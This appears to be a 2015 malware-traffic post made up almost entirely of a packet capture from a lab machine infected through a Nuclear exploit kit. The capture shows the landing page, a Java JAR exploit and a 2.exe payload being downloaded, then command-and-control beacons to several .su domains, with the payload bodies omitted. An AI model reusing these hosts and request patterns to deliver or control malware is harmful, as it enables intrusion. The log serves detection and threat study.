Nuclear Exploit Kit Exploiting Vulnerable Java – Installs Trojan Cidox.d Malware

By | June 18, 2015

2014-08-06 18:31:57.643670 IP 172.16.165.132.50043 > 94.229.64.227.80: Flags [S], seq 724820888, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-08-06 18:31:57.770688 IP 94.229.64.227.80 > 172.16.165.132.50043: Flags [S.], seq 3911690002, ack 724820889, win 64240, options [mss 1460], length 0
2014-08-06 18:31:57.772299 IP 172.16.165.132.50043 > 94.229.64.227.80: Flags [.], ack 1, win 64240, length 0
2014-08-06 18:31:57.772538 IP 172.16.165.132.50043 > 94.229.64.227.80: Flags [P.], seq 1:370, ack 1, win 64240, length 369
GET /63c81e76vfy8.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ports.changeyourschools[.]com/p/h/d/0.32.2/external.min.js?ver=1.40.4319
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: ibiz.counselingmoments[.]com
Connection: Keep-Alive

2014-08-06 18:31:57.772550 IP 94.229.64.227.80 > 172.16.165.132.50043: Flags [.], ack 370, win 64240, length 0
2014-08-06 18:31:58.055483 IP 94.229.64.227.80 > 172.16.165.132.50043: Flags [.], seq 1:1461, ack 370, win 64240, length 1460
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:30:02 GMT
Content-Type: text/html
Content-Length: 37497
Connection: keep-alive
X-Powered-By: PHP/5.3.27
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip

2014-08-06 18:32:08.158217 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [P.], seq 1:341, ack 1, win 64240, length 340
GET /746074750/3/1407342360.jar HTTP/1.1
content-type: application/x-java-archive
accept-encoding: pack200-gzip,gzip
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_15
Host: ibiz.counselingmoments[.]com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2014-08-06 18:32:08.158231 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [.], ack 341, win 64240, length 0
2014-08-06 18:32:08.986350 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 1:1356, ack 341, win 64240, length 1355
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:30:12 GMT
Content-Type: application/java
Content-Length: 12221
Connection: keep-alive
X-Powered-By: PHP/5.3.27
Accept-Ranges: bytes
Content-Disposition: inline; filename=746074750.jar
Vary: User-Agent

[12221-byte JAR payload (746074750.jar) omitted from the segments below]
2014-08-06 18:32:08.986664 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [.], seq 1356:2816, ack 341, win 64240, length 1460
2014-08-06 18:32:09.136907 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 12229:12491, ack 341, win 64240, length 262
2014-08-06 18:32:09.137116 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 12491, win 64240, length 0
2014-08-06 18:32:09.191662 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [P.], seq 341:560, ack 12491, win 64240, length 219
GET /f/3/1407342360/746074750/2 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_15
Host: ibiz.counselingmoments[.]com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2014-08-06 18:32:09.191675 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [.], ack 560, win 64240, length 0
2014-08-06 18:32:09.354657 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 12491:13846, ack 560, win 64240, length 1355
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:30:13 GMT
Content-Type: application/octet-stream
Content-Length: 204800
Connection: keep-alive
X-Powered-By: PHP/5.3.27
Accept-Ranges: bytes
Content-Disposition: inline; filename=2.exe
Vary: User-Agent

[204800-byte PE payload (2.exe) omitted from the segments below]
2014-08-06 18:32:10.844769 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 130409:131764, ack 560, win 64240, length 1355
2014-08-06 18:32:10.844887 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 131764, win 64240, length 0
2014-08-06 18:32:10.844961 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 131764:133119, ack 560, win 64240, length 1355
2014-08-06 18:32:10.848998 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 133119:134474, ack 560, win 64240, length 1355
2014-08-06 18:32:10.849049 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 134474, win 64240, length 0
2014-08-06 18:32:10.849218 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 134474:135829, ack 560, win 64240, length 1355
2014-08-06 18:32:10.970006 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 143959:145314, ack 560, win 64240, length 1355
2014-08-06 18:32:10.970729 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 145314, win 64240, length 0
2014-08-06 18:32:10.970821 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 145314:146669, ack 560, win 64240, length 1355
2014-08-06 18:32:10.971037 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 146669:148024, ack 560, win 64240, length 1355
2014-08-06 18:32:10.971118 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 148024, win 64240, length 0
2014-08-06 18:32:11.650639 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [P.], seq 560:781, ack 217561, win 64240, length 221
GET /f/3/1407342360/746074750/2/2 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_15
Host: ibiz.counselingmoments[.]com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2014-08-06 18:32:11.650707 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [.], ack 781, win 64240, length 0
2014-08-06 18:32:12.046049 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 217561:217826, ack 781, win 64240, length 265
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:30:16 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.27
Accept-Ranges: bytes
Content-Disposition: inline; filename=2.exe
Vary: User-Agent

2014-08-06 18:32:12.146510 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [P.], seq 217561:217826, ack 781, win 64240, length 265
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:30:16 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.27
Accept-Ranges: bytes
Content-Disposition: inline; filename=2.exe
Vary: User-Agent

2014-08-06 18:32:12.148449 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 217826, win 63975, length 0
2014-08-06 18:32:12.578137 IP 172.16.165.132.62833 > 172.16.165.2.53: 50026+ A? icepower[.]su. (29)
2014-08-06 18:32:12.975937 IP 172.16.165.2.53 > 172.16.165.132.62833: 50026 10/0/0 A 31.202.203.170, A 173.95.149.72, A 93.77.75.2, A 109.104.188.118, A 213.111.176.60, A 46.109.158.122, A 46.173.98.20, A 96.239.101.14, A 50.83.36.2, A 176.120.47.28 (189)
2014-08-06 18:32:14.255950 IP 172.16.165.132.50045 > 31.202.203.170.80: Flags [P.], seq 1:289, ack 1, win 64240, length 288
GET /b/shoe/1480 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: icepower[.]su
Cache-Control: no-cache

2014-08-06 18:32:14.255954 IP 31.202.203.170.80 > 172.16.165.132.50045: Flags [.], ack 289, win 64240, length 0
2014-08-06 18:32:19.144348 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [F.], seq 781, ack 217826, win 63975, length 0
2014-08-06 18:32:19.144363 IP 94.229.64.227.80 > 172.16.165.132.50044: Flags [.], ack 782, win 64239, length 0
2014-08-06 18:32:19.266036 IP 172.16.165.132.50044 > 94.229.64.227.80: Flags [.], ack 217827, win 63975, length 0
2014-08-06 18:32:22.677976 IP 31.202.203.170.80 > 172.16.165.132.50045: Flags [P.], seq 1:149, ack 289, win 64240, length 148
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:30:23 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 0
Connection: close

2014-08-06 18:32:22.678119 IP 172.16.165.132.50045 > 31.202.203.170.80: Flags [F.], seq 289, ack 149, win 64092, length 0
2014-08-06 18:32:22.678132 IP 31.202.203.170.80 > 172.16.165.132.50045: Flags [.], ack 290, win 64239, length 0
2014-08-06 18:32:22.680336 IP 172.16.165.132.50944 > 172.16.165.2.53: 59731+ A? smokejuse[.]su. (30)
2014-08-06 18:32:22.691952 IP 172.16.165.132.50045 > 31.202.203.170.80: Flags [.], ack 150, win 64092, length 0
2014-08-06 18:32:22.719525 IP 172.16.165.2.53 > 172.16.165.132.50944: 59731 10/0/0 A 37.229.104.171, A 37.115.65.28, A 176.73.87.120, A 5.248.202.100, A 188.230.15.191, A 46.119.185.140, A 176.113.239.177, A 68.45.64.5, A 109.206.56.144, A 46.173.71.207 (190)
2014-08-06 18:32:22.719914 IP 172.16.165.132.50046 > 37.229.104.171.80: Flags [S], seq 4148697549, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-08-06 18:32:22.936850 IP 37.229.104.171.80 > 172.16.165.132.50046: Flags [S.], seq 1590788489, ack 4148697550, win 64240, options [mss 1460], length 0
2014-08-06 18:32:22.936920 IP 172.16.165.132.50046 > 37.229.104.171.80: Flags [.], ack 1, win 64240, length 0
2014-08-06 18:32:22.937076 IP 172.16.165.132.50046 > 37.229.104.171.80: Flags [P.], seq 1:306, ack 1, win 64240, length 305
GET /mod_articles-rd4g89/jquery/ HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: smokejuse[.]su
Cache-Control: no-cache

2014-08-06 18:32:22.937168 IP 37.229.104.171.80 > 172.16.165.132.50046: Flags [.], ack 306, win 64240, length 0
2014-08-06 18:32:23.942536 IP 37.229.104.171.80 > 172.16.165.132.50046: Flags [P.], seq 1:1356, ack 306, win 64240, length 1355
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:31:39 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Content-disposition: attachment; filename=exe.exe
Pragma: no-cache
2014-08-06 18:33:16.185950 IP 172.16.165.132.62197 > 172.16.165.2.53: 1384+ A? vision-vaper[.]su. (33)
2014-08-06 18:33:16.217743 IP 172.16.165.2.53 > 172.16.165.132.62197: 1384 10/0/0 A 176.120.47.28, A 31.202.203.170, A 173.95.149.72, A 93.77.75.2, A 109.104.188.118, A 213.111.176.60, A 46.109.158.122, A 46.173.98.20, A 96.239.101.14, A 50.83.36.2 (193)
2014-08-06 18:33:16.219070 IP 172.16.165.132.49158 > 176.120.47.28.80: Flags [S], seq 2158736076, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-08-06 18:33:16.219257 IP 172.16.165.132.49159 > 176.120.47.28.80: Flags [S], seq 4212457540, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-08-06 18:33:16.400024 IP 176.120.47.28.80 > 172.16.165.132.49158: Flags [S.], seq 1728376890, ack 2158736077, win 64240, options [mss 1460], length 0
2014-08-06 18:33:16.400147 IP 172.16.165.132.49158 > 176.120.47.28.80: Flags [.], ack 1, win 64240, length 0
2014-08-06 18:33:16.400496 IP 172.16.165.132.49158 > 176.120.47.28.80: Flags [P.], seq 1:337, ack 1, win 64240, length 336
GET /b/eve/7a5684aab544793d37f05a96 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
Referer: http://www.google[.]com/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: vision-vaper[.]su
Connection: Keep-Alive

2014-08-06 18:33:16.400506 IP 176.120.47.28.80 > 172.16.165.132.49158: Flags [.], ack 337, win 64240, length 0
2014-08-06 18:33:16.473522 IP 176.120.47.28.80 > 172.16.165.132.49159: Flags [S.], seq 2575799741, ack 4212457541, win 64240, options [mss 1460], length 0
2014-08-06 18:33:16.473629 IP 172.16.165.132.49159 > 176.120.47.28.80: Flags [.], ack 1, win 64240, length 0
2014-08-06 18:33:16.795942 IP 172.16.165.132.49158 > 176.120.47.28.80: Flags [.], ack 180, win 64062, length 0
2014-08-06 18:33:16.796060 IP 172.16.165.132.49158 > 176.120.47.28.80: Flags [F.], seq 337, ack 180, win 64062, length 0
2014-08-06 18:33:16.796130 IP 176.120.47.28.80 > 172.16.165.132.49158: Flags [.], ack 338, win 64239, length 0
2014-08-06 18:34:11.112303 IP 172.16.165.132.64192 > 172.16.165.2.53: 34124+ A? vision-vaper[.]su. (33)
2014-08-06 18:34:11.151982 IP 172.16.165.2.53 > 172.16.165.132.64192: 34124 10/0/0 A 176.120.47.28, A 31.202.203.170, A 173.95.149.72, A 93.77.75.2, A 109.104.188.118, A 213.111.176.60, A 46.109.158.122, A 46.173.98.20, A 96.239.101.14, A 50.83.36.2 (193)
2014-08-06 18:34:11.152633 IP 172.16.165.132.49161 > 176.120.47.28.80: Flags [S], seq 3454884586, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-08-06 18:34:11.853076 IP 172.16.165.132.49161 > 176.120.47.28.80: Flags [S], seq 3454884586, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-08-06 18:34:12.538977 IP 172.16.165.132.49161 > 176.120.47.28.80: Flags [S], seq 3454884586, win 8192, options [mss 1460,nop,nop,sackOK], length 0
2014-08-06 18:34:12.982959 IP 172.16.165.132.49162 > 31.202.203.170.80: Flags [S], seq 419036014, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-08-06 18:34:14.178899 IP 31.202.203.170.80 > 172.16.165.132.49162: Flags [S.], seq 1028073192, ack 419036015, win 64240, options [mss 1460], length 0
2014-08-06 18:34:14.179009 IP 172.16.165.132.49162 > 31.202.203.170.80: Flags [.], ack 1, win 64240, length 0
2014-08-06 18:34:14.179216 IP 172.16.165.132.49162 > 31.202.203.170.80: Flags [P.], seq 1:466, ack 1, win 64240, length 465
POST /b/opt/A495069680AF592C4FBDA4BB HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: vision-vaper[.]su
Content-Length: 185
Cache-Control: no-cache

[185-byte binary POST body omitted]
2014-08-06 18:34:14.179262 IP 31.202.203.170.80 > 172.16.165.132.49162: Flags [.], ack 466, win 64240, length 0
2014-08-06 18:34:23.823221 IP 31.202.203.170.80 > 172.16.165.132.49162: Flags [P.], seq 1:405, ack 466, win 64240, length 404
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Aug 2014 22:32:24 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 254
Connection: close

[254-byte binary response body omitted]
2014-08-06 18:34:23.823357 IP 172.16.165.132.49162 > 31.202.203.170.80: Flags [F.], seq 466, ack 405, win 63836, length 0
2014-08-06 18:34:23.823366 IP 31.202.203.170.80 > 172.16.165.132.49162: Flags [.], ack 467, win 64239, length 0
2014-08-06 18:34:23.825144 IP 172.16.165.132.49163 > 31.202.203.170.80: Flags [S], seq 402949620, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-08-06 18:34:23.837360 IP 172.16.165.132.49162 > 31.202.203.170.80: Flags [.], ack 406, win 63836, length 0
2014-08-06 18:34:24.029937 IP 31.202.203.170.80 > 172.16.165.132.49163: Flags [S.], seq 790012687, ack 402949621, win 64240, options [mss 1460], length 0
2014-08-06 18:34:24.029961 IP 172.16.165.132.49163 > 31.202.203.170.80: Flags [.], ack 1, win 64240, length 0
2014-08-06 18:34:24.030117 IP 172.16.165.132.49163 > 31.202.203.170.80: Flags [P.], seq 1:220, ack 1, win 64240, length 219
GET /b/letr/9B249347C576AE4B0A6453DC HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: vision-vaper[.]su
Cache-Control: no-cache

2014-08-06 18:34:24.030127 IP 31.202.203.170.80 > 172.16.165.132.49163: Flags [.], ack 220, win 64240, length 0
2014-08-06 18:34:24.437520 IP 31.202.203.170.80 > 172.16.165.132.49163: Flags [P.], seq 1:1239, ack 220, win 64240, length 1238
HTTP/1.1 200 OK
